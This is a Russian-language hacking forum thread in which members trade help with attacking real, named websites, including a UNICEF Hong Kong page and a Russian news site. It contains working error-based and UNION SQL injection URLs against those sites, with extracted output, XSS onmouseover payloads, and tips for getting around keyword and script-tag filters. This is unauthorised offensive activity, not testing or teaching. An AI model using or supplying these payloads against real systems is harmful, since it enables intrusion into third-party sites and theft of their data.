Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    пробуй разные регистры, пробуй /*!information_schema.tables*/

    пробуй `information_scheme`.`tables`
     
    _________________________
    1 person likes this.
  2. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    Помогите!

    Товарищи!
    Откровенно говоря задолбался
    Начал тут познавать прелести xss.
    Просканил сайт одного провайдера, нашел вот что:
    PHP:
    " onmouseover=prompt(903167) bad="
    типо это xss, уязвимый параметр.
    сканил WVS, с английским проблем особо нет, но тут я затупил.
    мануалов не нашел, гугл мне не помог.
    прошу вас мне пояснить как это использовать, и желательно не выходя из программы^^
    PS: Знания веб хакинга есть, говорю ж осталось xss доучить
    PSS единственное что нашел, как пример:
    PHP:
    http://www.acunetix.com/blog/web-security-zone/articles/web-vulnerabilities-pligg/
     
  3. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    2stan0009,
    прочитай этот пост
    КЛАЦ!
    Вопросы должны отпасть.
     
    #19063 Ereee, 20 Jan 2012
    Last edited: 20 Jan 2012
  4. stan0009

    stan0009 Member

    Joined:
    30 Jul 2010
    Messages:
    118
    Likes Received:
    5
    Reputations:
    0
    что-то похожее, но не в моем случае.
    видел примеры таких xss типа такого запроса
    PHP:
    http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=0&IDS=1%22+onmouseover=alert(412439912585)+&PAGE=1
    про кавычки все правильно сказано, а про остальное соотнести не могу
    а еще...
    может verb tampering проще?
    кто нибудь встречался?
     
  5. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    Ребята, есть программа, с интерфейсом (понятно для новичнов) для того, чтоб проверил какие директории и файлы доступны для чтения ?
    т.е. вбиваешь WEB адрес и он сканирует сайт и выдает отчет по файлам и папкам.

    т.п. программы, как Acunetix Web Vulnerability Scanner не советовать, хочется менького и без лишних гемор.
     
  6. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    472
    Likes Received:
    780
    Reputations:
    313
    ну гугл site: xxx.ru

    самый простой вариант
     
  7. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    да ну ) ты че..
     
  8. Lilo

    Lilo Banned

    Joined:
    10 Mar 2009
    Messages:
    472
    Likes Received:
    780
    Reputations:
    313
    Avalanche
     
  9. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Verb Tampering? Забудь, сейчас таких уязвимостей мало(появился один с php, суть в том. что при передаче HEAD-ом php-скрипт выполнится до первого вывода инфы, что открывается баги). Твой WVS не сможет найти скульи без error-а, лучше всего с помощью WVS найти все скрипты, а шаманить уже самому. Насчет mil.be, у меня при твоем запросе перенаправляет. Чтобы отключить перенаправление, нужно отключить Javascript(XSS работать не будет), или отключить autoredirect(которое включено по умолчанию на всех браузерах).

    2B1t.exe, информация об доступности на запись хранится на сервере, ты просто не сможешь этого сделать.

    2Lilo, o_O
     
    #19069 Ereee, 21 Jan 2012
    Last edited: 21 Jan 2012
  10. narviss

    narviss New Member

    Joined:
    1 Aug 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    точьку ничем не заменишь, попробуй urlencode, хотя врятли поможет

    . = %2E
     
    _________________________
    2 people like this.
  12. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Как вариант, пробуй:
    infOrmAtion_schEma./**/tabLeS

    P.S. Обход точки невозможен. Придется угадать таблицы.
     
  13. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    I got the "order by" here.

    Code:
    https://www.unicef.org.hk/news/list_detail.php?id=234+order+by+17--+-
    Now "union select" does not work.

    Code:
    https://www.unicef.org.hk/news/list_detail.php?id=234+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+-

    Code:
    https://www.unicef.org.hk/news/list_detail.php?id=234%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28selectconcat%280x7e,0x27,cast%28version%28%29%20as%20char%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20frominformation_schema.tables%20group%20by%20x%29a%29%20and%201=1+--+
    Where is my fault now?
     
    1 person likes this.
  14. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    что то не могу дальше вывести
    Code:
    http://www.lenta.cjes.ru/
    ?nid=1089' and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x
     
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    2Faaax,
    Code:
    http://www.lenta.cjes.ru/?m=1&y=2012&lang=rus&nid=1089'+and(select+1+from(select+count(*),concat((select+concat(table_name,0x00)+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
    Результат:
    Code:
    Duplicate entry '[COLOR=Red]COLLATIONS[/COLOR]' for key 1
     
    1 person likes this.
  16. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Проблема с XSS. Пока что не хочу давать линк... проблема в том, что я хочу, чтоб при вводе в поиск вылетел алерт. Что я только не пробовал, но результат один и тот же:
    ввожу <script>alert()</script>, нажимаю Ентер, в поиске остается <sc.

    Ввожу "><script>alert()</script> - вывод "><sc и т .д. Фильтр обрезает все, что после SC.

    Какие есть еще варианты?
     
  17. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Ссылку покажи.
     
  18. _Spamer_

    _Spamer_ Elder - Старейшина

    Joined:
    3 Feb 2009
    Messages:
    89
    Likes Received:
    140
    Reputations:
    16
    Code:
    http://brandkom.com.ua/shop_content.php?coID=10
    Есть уязвимость тут?
     
  19. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Не думаю. Так как в твоем случаи:
    Code:
    +and+1=1 true
    +and+1=0 true
    Да и ничего не меняется при вставке кавычки.
     
    1 person likes this.
  20. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,600
    Likes Received:
    1,308
    Reputations:
    1,557
    jecka3000, вариантов очень много. Для начала надо определить, какие теги пропускает фильтр и в зависимости от этого использовать события. Все зависит от конкретного сайта. Скинь ссылку в личку, если не хочешь выкладывать в теме.
     
Loading...
Thread Status:
Not open for further replies.